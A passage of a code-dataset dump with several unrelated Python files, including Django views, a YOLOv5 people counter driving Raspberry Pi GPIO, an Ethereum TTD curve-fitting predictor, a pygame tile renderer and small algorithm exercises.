public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nurlpatterns = [\n re_path(r'^swagger(?P\\.json|\\.yaml)$', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('admin/', admin.site.urls),\n path('login', Login.as_view(), name='login'),\n path('logout', Logout.as_view(), name='logout'),\n path('api/', include('apps.users.api.urls')),\n path('api/', include('apps.quiniela_main.api.urls')),\n]\n\n","repo_name":"AlvaroGarnicaBarco/django-quiniela","sub_path":"quiniela/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19098912205","text":"from django.db import models\n\n# Create your models here.\nfrom django.db import models\n\n# Create your models here.\nimport numpy as np\nimport pickle\n\n\nimport numpy as np\nimport pandas as pd\n#from sklearn.preprocessing import LabelEncoder\n\n\n\n\nknn = pickle.load(open(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\traffic_knn.pkl', 'rb'))\nrf = pickle.load(open(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\traffic_rf.pkl', 'rb'))\n\ndata = pd.read_csv(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\new_test_data.csv')\nprint(data.head(1))\nprint(data.shape)\n#x = data.drop(['Unnamed: 0'],axis=1)\n\ndef predict(algo,row):\n\t#print(x.columns)\n\ttest_data=data.loc[row].values.reshape(1,-1)\n\tprint(test_data.shape)\n\t#print(test_data.columns)\n\tif algo == 'knn':\n\t\ty_pred = knn.predict(test_data)\n\t\treturn y_pred[0]\n\telif algo == 'rf':\n\t\ty_pred = rf.predict(test_data)\n\t\treturn y_pred[0]\n\t","repo_name":"Roheetth/Traffic_Prediction","sub_path":"traffic_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45141108867","text":"from turtle import Turtle, Screen\nimport random\n\n\nclass Car(Turtle):\n def __init__(self, number):\n super().__init__()\n self.penup()\n self.shape(\"square\")\n self.screen = Screen()\n self.screen.colormode(255)\n self.shapesize(1.5, 3)\n self.color(self.set_random_color())\n self.direction = self.set_random_direction()\n self.original_pos = self.set_position(number)\n self.setposition(self.original_pos)\n self.car_speed = 0\n\n def set_random_color(self):\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n random_color = (r, g, b)\n return random_color\n\n def set_position(self, number):\n self.x = self.direction\n self.y = -275 + 40 * (number + 1)\n return (self.x * 350, self.y)\n\n def set_random_direction(self):\n self.dir = random.randrange(-1, 1)\n if self.dir == 0:\n self.dir = 1\n return self.dir\n\n def update_position(self):\n self.setposition(self.xcor() - self.dir * self.car_speed, self.ycor())\n\n def set_random_speed(self, level):\n self.car_speed = random.randint(3, 10) + level\n\n","repo_name":"Ninjobik/Day_23_Crossy_Roads","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27862203058","text":"#!/usr/bin/env python\nimport time\nimport sys\n\ntry:\n fp = sys.argv[1]\nexcept:\n fp = 'book.log'\n\nlast = None\n\nwhile True:\n\n time.sleep(0.001)\n\n try:\n asdf = open(fp).readlines()\n except: continue\n\n if asdf != last and len(asdf) > 0 and 'EOF' in asdf[-1]:\n i = asdf.index('bids\\n')\n\n print('\\033c' + 'offers\\n' + ''.join(asdf[max(0,i-11):min(len(asdf),i+11)]))\n last = asdf\n","repo_name":"benzyx/tamit2019","sub_path":"print_book.py","file_name":"print_book.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"26451884640","text":"import datetime\n\nfrom django.contrib.auth.models import User\nfrom .models import Task, Comment, Status\nfrom .forms import AddCommentForm, UpdateTaskForm, FilterForm, AddTaskForm\nfrom rest_framework.viewsets import ModelViewSet\nfrom .serializers import TaskSerializer\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.permissions import IsAdminUser, IsAuthenticated, AllowAny\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom rest_framework.response import Response\nfrom django.shortcuts import render, redirect\nfrom django.db.models import Q\n\n\ndef check_deadline():\n\t\"\"\"Функция проверки даты окончания задачи и присвоения задаче соответствующего статуса \"\"\"\n\tdate = datetime.date.today()\n\n\tstatus = Status.objects.get(title='просрочена')\n\ttask_for_update = Task.objects.filter(date_date_to__lt=date).filter(status=Status.objects.get(title='в работе'))\n\tfor task in task_for_update:\n\t\ttask.status = status\n\tTask.objects.bulk_update(task_for_update, ['status'])\n\n\tstatus = Status.objects.get(title='в работе')\n\ttask_for_update = Task.objects.filter(date_date_to__gt=date).filter(status=Status.objects.get(title='просрочена'))\n\tfor task in task_for_update:\n\t\ttask.status = status\n\tTask.objects.bulk_update(task_for_update, ['status'])\n\n\nclass TaskList(ModelViewSet):\n\t\"\"\"Представление списка задач в зависимости от запроса (get, post, put, delete).\"\"\"\n\tserializer_class = TaskSerializer\n\n\tqueryset = Task.objects.all()\n\tpermission_classes_by_action = {'create': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'list': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'retrieve': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'update': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'destroy': [IsAdminUser],\n\t\t\t\t\t\t\t\t\t}\n\tfilter_backends = [DjangoFilterBackend]\n\tfilterset_fields = ['responsible', 'status']\n#\tordering_fields = ['title', 'responsible', 'date_from', 'date_date_to', 'status']\n\trenderer_classes = [TemplateHTMLRenderer]\n\ttemplate_name = 'main.html'\n\n\tdef list(self, request, *args, **kwargs):\n\t\tcheck_deadline()\n\t\ttask_filter_form = FilterForm()\n\t\tqueryset = self.filter_queryset(self.get_queryset())\n\t\tserializer = self.get_serializer(queryset, many=True)\n\t\treturn Response({'tasks': serializer.data, 'task_filter_form': task_filter_form}, template_name='main.html')\n\n\tdef get(self, request, *args, **kwargs):\n\t\tcheck_deadline()\n\t\ttask_filter_form = FilterForm()\n\t\tcomment_form = AddCommentForm()\n\t\tinstance = self.get_object()\n\t\tserializer = self.get_serializer(instance)\n\t\tcomments = Comment.objects.filter(task_id=instance.id).select_related('user')\n\t\tresponsibles = User.objects.all().values('id', 'username')\n\t\treturn Response({'task': serializer.data, 'comment_form': comment_form, 'comments':comments,\n\t\t\t\t\t\t 'responsibles': responsibles, 'task_filter_form': task_filter_form}, template_name='task.html')\n\n\tdef create(self, request, *args, **kwargs):\n\t\ttask_form = AddTaskForm(request.POST)\n\t\ttask_filter_form = FilterForm()\n\t\tif task_form.is_valid():\n\t\t\ttitle = task_form.cleaned_data.get('title')\n\t\t\tresponsible = task_form.cleaned_data.get('responsible')\n\t\t\tdate_date_to = task_form.cleaned_data.get('date_date_to')\n\t\t\tstatus = task_form.cleaned_data.get('status')\n\t\t\tTask.objects.create(title=title, responsible=responsible, date_date_to=date_date_to, status=status)\n\t\t# serializer = self.get_serializer(data=request.POST)\n\t\t# serializer.is_valid(raise_exception=True)\n\t\t# self.perform_create(serializer)\n\t\t# headers = self.get_success_headers(serializer.data)\n\t\ttasks = Task.objects.all().select_related('responsible')\n\t\treturn Response({'tasks': tasks, 'task_filter_form': task_filter_form}, template_name='main.html')\n\n\tdef update(self, request, *args, **kwargs):\n\t\ttask_filter_form = FilterForm()\n\t\tpk = kwargs['pk']\n\t\tinstance = self.get_object()\n\t\ttask_form_update = UpdateTaskForm(request.POST)\n\t\ttask = Task.objects.get(id=pk)\n\t\tcomments = Comment.objects.filter(task_id=instance.id).select_related('user')\n\t\tresponsibles = User.objects.all().values('id', 'username')\n\t\tcomment_form = AddCommentForm()\n\t\tif task_form_update.is_valid():\n\t\t\ttask.title = task_form_update.cleaned_data.get('title')\n\t\t\ttask.responsible = task_form_update.cleaned_data.get('responsible')\n\t\t\ttask.date_date_to = task_form_update.cleaned_data.get('date_date_to')\n\t\t\ttask.status = task_form_update.cleaned_data.get('status')\n\t\t\ttask.save()\n\t\t\tComment.objects.create(user=request.user, task=task, descr=f'редактирование задачи')\n\t\t\treturn Response({'task': task, 'comment_form': comment_form,\n\t\t\t\t\t\t\t 'comments': comments, 'responsibles': responsibles, 'task_filter_form': task_filter_form},\n\t\t\t\t\t\t\ttemplate_name='task.html')\n\n\tdef get_permissions(self):\n\t\ttry:\n\t\t\t# return permission_classes depending on `action`\n\t\t\treturn [permission() for permission in self.permission_classes_by_action[self.action]]\n\t\texcept KeyError:\n\t\t\t# action is not set return default permission_classes\n\t\t\treturn [permission() for permission in self.permission_classes]\n\n","repo_name":"AVKulikov1982/Tasks","sub_path":"app_tasks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39996451494","text":"import rectop\n\nfrom lib.external import pygame\n\nDEBUGCOLOR = (200,30,200)\n\nCURVE_CONNECTIONS = {\n ('midtop', 'midright'): 'topright',\n ('midright', 'midbottom'): 'bottomright',\n ('midbottom', 'midleft'): 'bottomleft',\n ('midleft', 'midtop'): 'topleft',\n}\n\ndef tile(midpoints_radius, corners_radius, connections):\n \"\"\"\n Render truchet tile.\n :param connections: 2-tuples of midpoint names to connect.\n \"\"\"\n frame_bg_color = (30,) * 3\n tile_bg_color = (60,) * 3\n midpoint_color = (20,) * 3\n\n # NOTES\n # * maybe the little dots should not be \"connectors\" they should be \"terminators\".\n # * transparent \"outside the tile\" so that the overlapping works.\n\n small_diameter = midpoints_radius * 2\n big_diameter = corners_radius * 2\n\n frame_side_length = big_diameter * 2 + small_diameter\n frame_rect = pygame.Rect((0, )*2, (frame_side_length,)*2)\n\n surf = pygame.Surface(frame_rect.size)\n surf.fill(frame_bg_color)\n\n sidelen = big_diameter + small_diameter\n tile_rect = rectop.get.new(\n size = (sidelen, ) * 2,\n center = frame_rect.center,\n )\n\n # fill inner tile area\n pygame.draw.rect(surf, tile_bg_color, tile_rect)\n\n # separate curves and straight connectors so they can be draw in an order.\n curve_radius = tile_rect.width // 2 + midpoints_radius\n dots = []\n connrects = []\n curves = []\n for attrs in connections:\n attr1, attr2 = attrs\n if attr1 is None:\n dots.append(attr2)\n elif attr2 is None:\n dots.append(attr1)\n elif rectop.get.opposite_midpoint(attr1) == attr2:\n # rect\n point1 = getattr(tile_rect, attr1)\n point2 = getattr(tile_rect, attr2)\n # sort top-bottom, left-right\n point1, point2 = sorted([point1, point2], key=lambda p: (p[1], p[0]))\n if (\n # already confirmed a mid point\n ('top' in attr1 or 'bottom' in attr1)\n and\n ('top' in attr2 or 'bottom' in attr2)\n ):\n # top-bottom\n x = tile_rect.centerx - midpoints_radius\n y = tile_rect.top\n width = small_diameter\n height = tile_rect.height\n else:\n # left-right\n x = tile_rect.left\n y = tile_rect.centery - midpoints_radius\n height = small_diameter\n width = tile_rect.width\n connrect = pygame.Rect(x,y,width,height)\n connrects.append((midpoint_color, connrect, 0))\n else:\n # curve\n # find the corner to put a big circle in for the \"curve\"\n for ATTRS, pointattr in CURVE_CONNECTIONS.items():\n if set(ATTRS) == set(attrs):\n break\n else:\n raise ValueError\n corner_point = getattr(tile_rect, pointattr)\n curves.append((midpoint_color, corner_point, curve_radius, 0))\n curves.append((tile_bg_color, corner_point, corners_radius, 0))\n\n # draw \"curves\"\n for color, center, radius, width in curves:\n pygame.draw.circle(surf, color, center, radius, width)\n\n # \"clear\" the big curve circles from the outside of the tile\n # NOTE: maybe do this with a separate surface, letting clipping do the work?\n for outside_rect in rectop.cut.with_knife(tile_rect, frame_rect):\n pygame.draw.rect(surf, frame_bg_color, outside_rect, 0)\n\n # draw debugging big circles on corners\n for point in rectop.get.corners(tile_rect):\n pygame.draw.circle(surf, DEBUGCOLOR, point, corners_radius, 1)\n\n # draw straight horizontal and vertical connectors\n for color, rect, width in connrects:\n pygame.draw.rect(surf, color, rect, width)\n\n # draw little \"connector\" circles in midpoints\n for attr in dots:\n point = getattr(tile_rect, attr)\n pygame.draw.circle(surf, midpoint_color, point, midpoints_radius, 0)\n\n # draw the tile frame\n pygame.draw.rect(surf, DEBUGCOLOR, tile_rect, 1)\n\n return surf\n","repo_name":"hitbox/scratch","sub_path":"pygame/shrinkwrap/render/truchet.py","file_name":"truchet.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73389757226","text":"import json\nimport os\nimport time\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nT = 10 ** 12\nP = T * 1000\ndegree = int(os.environ['DEGREE'])\nstep = int(os.environ['STEP'])\ntolerance = counter = int(os.environ['TOLERANCE'])\nblock_interval = int(os.environ['ETH_INTERVAL'])\ninterval = int(os.environ['INTERVAL'])\n\ntime_target = int(os.environ['TIME_TARGET'])\ntime_span = int(os.environ['TIME_SPAN'])\nttd_target = float(os.environ['TTD_TARGET'])\n\nwarnings.filterwarnings('ignore')\n\nspans = {'7d': int(7 * 24 * 3600 / interval), '14d': int(14 * 24 * 3600 / interval),\n '28d': int(28 * 24 * 3600 / interval)}\n\n\ndef moving_average(data, step=30):\n ma_data = []\n for index in range(data.size - step):\n ma_data.append(sum(data[index:index + step]) // step)\n return ma_data\n\n\ndef adjust_length(data, step=30):\n return data[step:]\n\n\ndef poly_predict(t, ttd):\n l = len(t)\n coeff = {}\n coeff['coeff_ttd'] = np.polyfit(t, ttd, degree)\n\n # Errors\n err_h = []\n err_l = []\n err = []\n coeff['poly_value'] = []\n for i in range(l):\n coeff['poly_value'].append(np.polyval(coeff['coeff_ttd'], t[i]))\n diff = abs(coeff['poly_value'][-1] - ttd[i])\n err.append(diff ** 2)\n err_h.append(diff + ttd[i])\n err_l.append(ttd[i] - diff)\n\n coeff['coeff_h'] = np.polyfit(t, err_h, degree)\n coeff['coeff_l'] = np.polyfit(t, err_l, degree)\n\n # Mean squared error\n MSE = np.average(err)\n # print(\"MSE: \", MSE)\n\n # Training split\n train_size = int((l - 1) * 0.75)\n t_train = t[0:train_size]\n ttd_train = ttd[0:train_size]\n\n coeff['coeff_train'] = np.polyfit(t_train, ttd_train, degree)\n\n # Print the equation\n # i = 0\n # while i <= degree:\n # if i == degree:\n # print(\"(%.10f)\" % (coeff['coeff_ttd'][i]))\n # break\n # print(\"(%.10f*x^%d)+\" % (coeff['coeff_ttd'][i], degree - i,), end=\"\")\n # i += 1\n\n return coeff\n\n\ndef choosing_roots(roots):\n for root in roots:\n root = int(root)\n if root < 0:\n continue\n if abs(root - time_target) >= time_span:\n continue\n\n return root\n\n\ndef estimate_ttd(polynom_ttd, ttd, coeff_h, coeff_l):\n # Find x for given y\n result = {}\n substitute = np.copy(polynom_ttd)\n substitute[-1] -= ttd_target\n result['point'] = choosing_roots(np.roots(substitute))\n\n substitute = np.copy(coeff_h)\n substitute[-1] -= ttd_target\n result['point_high'] = choosing_roots(np.roots(substitute))\n\n substitute = np.copy(coeff_l)\n substitute[-1] -= ttd_target\n result['point_low'] = choosing_roots(np.roots(substitute))\n\n # Calculated averages from data\n ttd_diff_avg = int(np.average(np.diff(ttd)))\n # time_diff_avg = int(np.average(np.diff(t)))\n return result\n\n\ndef analyze():\n blocks = json.load(fp=open('points.json', 'r'))\n result = {'timestamp_list': [], 'origin_curve': [], 'predict_curves': [],\n 'update_info': {'number': blocks[-1]['number'], 'timestamp': blocks[-1]['timestamp']}}\n for curve_name, span in spans.items():\n data = load_data(span, blocks)\n t_data, ts_str_data, ts_data, hashrate_data, ttd_data = data['UnixTimestamp'], [], [], data['Difficulty'], data[\n 'TTD']\n for index in range(data.index.size):\n t = int(data['UnixTimestamp'][index])\n ts_data.append(t)\n ts_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t))\n ts_str_data.append(ts_str)\n\n coeff = poly_predict(t_data, ttd_data)\n roots = estimate_ttd(coeff['coeff_ttd'], ttd_data, coeff['coeff_h'], coeff['coeff_l'])\n for k, v in roots.items():\n print(k, v, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(v)))\n predict_info = predict_line(poly_params=coeff['coeff_ttd'], ts_data=ts_data)\n\n if len(result['timestamp_list']) <= len(predict_info['ts_str']):\n result['timestamp_list'] = to_list(predict_info['timestamp'])\n if len(result['origin_curve']) <= ttd_data.size:\n result['origin_curve'] = to_list(ttd_data)\n result['predict_curves'].append(\n {'name': 'predict_curve_{}'.format(curve_name), 'data': to_list(predict_info['poly_value']),\n 'root': [str(roots.get('point')), os.environ['TTD_TARGET']]})\n json.dump(result, indent=2, fp=open(\"{}.json\".format('data'), 'w'))\n return result\n\n\ndef load_data(span, blocks):\n data = {\n 'BlockNumber': [],\n 'TTD': [],\n 'Difficulty': [],\n 'UnixTimestamp': []\n }\n\n for block in blocks[-span:]:\n data['BlockNumber'].append(block['number'])\n data['TTD'].append(float(block['totalDifficulty']))\n data['Difficulty'].append(block['difficulty'])\n data['UnixTimestamp'].append(block['timestamp'])\n df = pd.DataFrame(data)\n return df[['BlockNumber', 'TTD', 'Difficulty', 'UnixTimestamp']]\n\n\ndef predict_line(poly_params, ts_data, span=30 * 24 * 60 * 60):\n predict_dict = {'timestamp': [], 'ts_str': [], 'poly_value': []}\n for t in ts_data:\n predict_dict['timestamp'].append(t)\n predict_dict['ts_str'].append(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t)))\n predict_dict['poly_value'].append(np.polyval(poly_params, t))\n start = ts_data[-1] - ts_data[-1] % interval\n for t in range(start, span + start, interval):\n predict_dict['timestamp'].append(t)\n predict_dict['ts_str'].append(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t)))\n predict_dict['poly_value'].append(np.polyval(poly_params, t))\n return predict_dict\n\n\ndef to_list(data):\n lst = []\n for i in range(len(data)):\n lst.append(str(int(data[i])))\n return lst\n\n\nif __name__ == \"__main__\":\n data = analyze()\n","repo_name":"Zachary-Lingle/predict_eth2_merge","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30094542760","text":"import torch\r\nimport cv2\r\nimport random\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport math\r\nimport time\r\n\r\n# Load the Model\r\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5n', pretrained=True)\r\nmodel.classes=[0]\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\nwidth = int(cap.get(3)); height = int(cap.get(4)); \r\n\r\nframeno=0\r\nnum_people=0\r\nfpsStart = 0\r\nfps = 0\r\n\r\n\r\n\r\n# returns coordinates of box as list\r\ndef box_coords(box):\r\n xmin=int(box[0])\r\n ymin=int(box[1])\r\n xmax=int(box[2])\r\n ymax=int(box[3])\r\n return [xmin, ymin, xmax, ymax]\r\n\r\n# checks if box touches the bottom of frame\r\ndef checkbot_box(coords,height):\r\n ymax=coords[3]\r\n if ymax>height-(height/54):\r\n return 1\r\n else:\r\n return 0\r\n\r\n# returns center coordinates of box\r\ndef box_cent(coords):\r\n cent_x=int((coords[0]+coords[2])/2)\r\n cent_y=int((coords[1]+coords[3])/2)\r\n return [cent_x,cent_y]\r\n\r\n# gets intersecting area of two boxes\r\ndef inters_area(coord1,coord2):\r\n xmin1=coord1[0]\r\n ymin1=coord1[1]\r\n xmax1=coord1[2]\r\n ymax1=coord1[3]\r\n xmin2=coord2[0]\r\n ymin2=coord2[1]\r\n xmax2=coord2[2]\r\n ymax2=coord2[3]\r\n dx=min(xmax1,xmax2)-max(xmin1,xmin2)\r\n dy=min(ymax1,ymax2)-max(ymin1,ymin2)\r\n if (dx>0) and (dy>0):\r\n return dx*dy\r\n else:\r\n return 0\r\n\r\n# returns list of coordinates of boxes in current frame that are new (no corresponding box in previous frame)\r\ndef newbox(coordlist,i_list):\r\n new_list=[]\r\n for k in coordlist:\r\n if k not in [i[0] for i in i_list]:\r\n new_list+=[k]\r\n return new_list\r\n\r\n# returns list of coordinates of boxes in previous frame that have disappeared (no corresponding box in current frame)\r\ndef dispbox(prev_coordlist,i_list):\r\n disp_list=[]\r\n for k in prev_coordlist:\r\n if k not in [i[1] for i in i_list]:\r\n disp_list+=[k]\r\n return disp_list\r\n\r\n# finds which box in previous slide is the one in current frame (highest intersecting area)\r\ndef matchboxes(coordlist,prev_coordlist,width):\r\n i_list=[]\r\n for coord in coordlist:\r\n area=0\r\n add_ilist=[]\r\n for prev_coord in prev_coordlist:\r\n if inters_area(coord,prev_coord)>area and (math.dist(box_cent(coord),box_cent(prev_coord))<(4*width/20)):\r\n area=inters_area(coord,prev_coord)\r\n add_ilist=[[coord, prev_coord]]\r\n if coord not in [i[0] for i in i_list] and prev_coord not in [j[1] for j in i_list]:\r\n i_list+=add_ilist\r\n return i_list\r\n\r\n\r\n# COUNT_PEOPLE_FRAMEOUT(prev_results, results, frame, rect_frame, num_people)\r\ndef COUNT_PEOPLE_FRAMEOUT(dataPre, dataCur, frame, frameCopy, num_people):\r\n # create lists of all box coordinates in previous and current frame\r\n prev_coordlist=[]\r\n for j in range(len(dataPre.xyxy[0])):\r\n prev_coords=box_coords(dataPre.xyxy[0][j])\r\n prev_coordlist+=[prev_coords]\r\n coordlist=[]\r\n for k in range(len(dataCur.xyxy[0])):\r\n coords=box_coords(dataCur.xyxy[0][k])\r\n coordlist+=[coords]\r\n \r\n for c in coordlist:\r\n cv2.rectangle(frameCopy,(c[0],c[1]),(c[2],c[3]),(255,0,0),thickness=-1)\r\n \r\n # list of boxes that have corresponding boxes in previous frame\r\n i_list=matchboxes(coordlist, prev_coordlist, width)\r\n \r\n # get list of boxes that are new in the frame\r\n new_list=newbox(coordlist,i_list)\r\n \r\n # get list of boxes that have disappeared\r\n disp_list=dispbox(prev_coordlist,i_list)\r\n \r\n # adjust number of people and draw rectangles\r\n for new_coords in new_list:\r\n if checkbot_box(new_coords,height)==1:\r\n num_people-=1\r\n cv2.rectangle(frameCopy,(new_coords[0],new_coords[1]),(new_coords[2],new_coords[3]),(0,0,255),thickness=-1)\r\n \r\n for disp_coords in disp_list:\r\n if checkbot_box(disp_coords,height)==1:\r\n num_people+=1\r\n cv2.rectangle(frameCopy,(disp_coords[0],disp_coords[1]),(disp_coords[2],disp_coords[3]),(0,255,0),thickness=-1)\r\n \r\n # add the rectangles to the frame\r\n frame=cv2.addWeighted(frameCopy,0.3,frame,0.7,1.0)\r\n\r\n return frame, num_people\r\n\r\n\r\n\r\n\r\n\r\nimport RPi.GPIO as GPIO\r\nGPIO.setmode(GPIO.BCM)\r\npin_num = 21\r\nGPIO.setup(pin_num, GPIO.OUT, initial=GPIO.LOW)\r\n\r\ndef GPIO_LIGHT(numPeople, frame):\r\n if numPeople > 0: GPIO.output(pin_num, GPIO.HIGH)\r\n else: GPIO.output(pin_num, GPIO.LOW)\r\n\r\n cv2.circle(frame, (int(width*0.9), int(height*0.9)), radius=31, color=(0,0,0), thickness=cv2.FILLED) \r\n if numPeople > 0: \r\n cv2.putText(frame, 'ON' ,(int(width*0.865), int(height*0.92)), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 255), 2) \r\n \r\n\r\n\r\n\r\n\r\n \r\nresultFINAL = cv2.VideoWriter('demovideo.avi', cv2.VideoWriter_fourcc(*'XVID'), cap.get(cv2.CAP_PROP_FPS), (width, height)) # 3 is FPS / cap.get(cv.CAP_PROP_FPS)\r\n\r\nwhile(1):\r\n frameno+=1\r\n _, frame = cap.read()\r\n \r\n # create frames for color filling in\r\n rect_frame=frame.copy()\r\n\r\n\r\n results = model(frame)\r\n if frameno==1:\r\n prev_results=results\r\n \r\n\r\n\r\n frame, num_people = COUNT_PEOPLE_FRAMEOUT(prev_results, results, frame, rect_frame, num_people)\r\n\r\n # send rasp GPIO command \r\n GPIO_LIGHT(num_people, frame)\r\n\r\n\r\n fpsEnd = time.time()\r\n timeDiff = fpsEnd - fpsStart\r\n fps = 1/timeDiff\r\n fpsStart = fpsEnd\r\n\r\n fpsText = \"FPS: {:2.2f}\".format(fps)\r\n cv2.putText(frame, fpsText, (int(width/40), int(height/15)), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 255), 2) \r\n\r\n num_peopletxt=\"Number of people entered: \"+str(num_people)\r\n if num_people>0:\r\n cv2.putText(frame, num_peopletxt, (int(width/40), height-int(width/40)), cv2.FONT_HERSHEY_COMPLEX, 0.8, (255, 255, 255), 2)\r\n else:\r\n cv2.putText(frame, num_peopletxt, (int(width/40), height-int(width/40)), cv2.FONT_HERSHEY_COMPLEX, 0.8, (255, 255, 0), 2)\r\n \r\n cv2.namedWindow(\"result\", cv2.WINDOW_NORMAL)\r\n cv2.imshow(\"result\", frame)\r\n \r\n\r\n resultFINAL.write(frame)\r\n\r\n\r\n prev_results=results\r\n \r\n k = cv2.waitKey(5) & 0xFF\r\n if k == 27:\r\n GPIO.output(pin_num, GPIO.LOW)\r\n GPIO.cleanup()\r\n break\r\n if k == 114 or k == 82:\r\n num_people = 0\r\n\r\n\r\ncap.release()\r\nresultFINAL.release()\r\n\r\ncv2.destroyAllWindows()\r\n","repo_name":"SungJooo/DLIP_FINAL","sub_path":"DLIP_Final_10_LAST.py","file_name":"DLIP_Final_10_LAST.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15875546916","text":"'''\n문제 요약\n내부요소를 삭제함으로써 전투력이 내림차순으로 정렬되도록 함\n최대한 많은 인원이 구성되어있도록 함\n열외시켜야하는 병사의 수 출력하기\n\n논리\n- LDS(Longest Decreasing Subsequence)\n- 현재의 위치에서 이전의 요소들에 대해서 각 요소들이 가진 최장 감소 수와 비교\n- 각 위치는 이전에 어떤 경우로 만들어진 수인지와 상관없이 최장 감소 수를 저장하고 있다.\n- 현재 위치가 이전의 위치 요소 값과 비교하여 작다면, 각 이전의 요소 dp + 1 vs 현재 위치 dp\n- 작다면 갱신\n\n'''\nimport sys\nsys.stdin = open('input.txt')\n\n\nn = int(input())\narr = list(map(int, input().split()))\ndp = [1 for _ in range(n)]\n\nfor i in range(n):\n for j in range(i):\n if arr[j] > arr[i]:\n dp[i] = max(dp[i], dp[j] + 1)\nprint(n-max(dp))\n","repo_name":"WonilLee211/group_study_algorithm","sub_path":"APS/221026_DP/34_LWI_DP_placeSoldier.py","file_name":"34_LWI_DP_placeSoldier.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24652742604","text":"from cafe.drivers.unittest.decorators import tags\nfrom cloudcafe.images.common.types import ImageMemberStatus\nfrom cloudroast.images.fixtures import ImagesFixture\n\n\nclass ForceUserToSeeMyImagesTest(ImagesFixture):\n\n @tags(type='positive', regression='true')\n def test_force_a_user_to_see_my_images(self):\n \"\"\"\n @summary: Force a user to see my images\n\n 1) Create an image as tenant\n 2) Verify that alternative tenant cannot access image_one\n 3) Add alternative tenant as a member of image (share image with\n alternative tenant)\n 4) Verify that alternative tenant can access image\n 5) Update alternative tenant membership status to 'Rejected',\n for image\n 6) Verify that alternative tenant is still able to access image\n directly\n \"\"\"\n\n alt_tenant_id = self.alt_tenant_id\n image = self.images_behavior.create_image_via_task()\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 404)\n\n response = self.images_client.add_member(image_id=image.id_,\n member_id=alt_tenant_id)\n self.assertEqual(response.status_code, 200)\n member = response.entity\n self.assertEqual(member.member_id, alt_tenant_id)\n self.assertEqual(member.status, ImageMemberStatus.PENDING)\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 200)\n get_image_resp = response.entity\n self.assertEqual(get_image_resp.id_, image.id_)\n\n response = self.alt_images_client.update_member(\n image_id=image.id_, member_id=alt_tenant_id,\n status=ImageMemberStatus.REJECTED)\n self.assertEqual(response.status_code, 200)\n updated_member = response.entity\n self.assertEqual(updated_member.member_id, alt_tenant_id)\n self.assertEqual(updated_member.status, ImageMemberStatus.REJECTED)\n\n response = self.alt_images_client.get_image(image_id=image.id_)\n self.assertEqual(response.status_code, 200)\n get_image_resp = response.entity\n self.assertEqual(get_image_resp.id_, image.id_)\n","repo_name":"jcourtois/rpc9_cloudroast","sub_path":"cloudroast/images/v2/functional/test_force_a_user_to_see_my_images.py","file_name":"test_force_a_user_to_see_my_images.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18731891298","text":"import sys\nm=int(sys.stdin.readline().strip())\nn=int(sys.stdin.readline().strip())\narr=[False,False]+[True]*(n+1)\nfor i in range(2,n+1):\n for j in range(i+i,n+1,i):\n if arr[j]:\n arr[j]=False\nresult=0+sum(i if arr[i] else 0 for i in range(m,n+1))\nprint(result if result!=0 else -1)\nif result!=0:\n for i in range(m,n+1):\n if 